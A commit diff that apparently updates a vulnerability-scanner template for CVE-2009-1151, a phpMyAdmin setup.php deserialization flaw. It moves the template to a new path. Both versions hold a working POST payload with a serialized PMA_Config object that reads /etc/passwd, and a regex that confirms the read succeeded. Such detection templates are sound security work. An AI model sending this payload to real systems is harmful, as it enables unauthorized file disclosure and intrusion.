template updates

cves/2009/CVE-2009-1151.yaml

@@ -0,0 +1,35 @@
+id: CVE-2009-1151
+
+info:
+  name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
+  author: princechaddha
+  severity: high
+  description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
+  reference: https://www.phpmyadmin.net/security/PMASA-2009-3/
+  vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
+  tags: phpmyadmin,rce,deserialization
+
+requests:
+  - raw:
+      - |
+        POST /scripts/setup.php HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Accept-Language: en
+        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+        Connection: close
+        Content-Type: application/x-www-form-urlencoded
+        Content-Length: 80
+
+        action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"

vulnerabilities/other/phpmyadmin-setup-deserialization.yaml

@@ -1,18 +0,0 @@
-id: phpmyadmin-setup-deserialization
-info:
-  name: phpmyadmin Scripts/setup.php Deserialization Vulnerabilityn
-  author: princechaddha
-  severity: high
-  reference: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
-  tags: phpmyadmin,rce
-
-requests:
-  - method: POST
-    path:
-      - "{{BaseURL}}/scripts/setup.php"
-    body: 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}'
-
-    matchers:
-      - type: regex
-        regex:
-          - "root:[x*]:0:0:"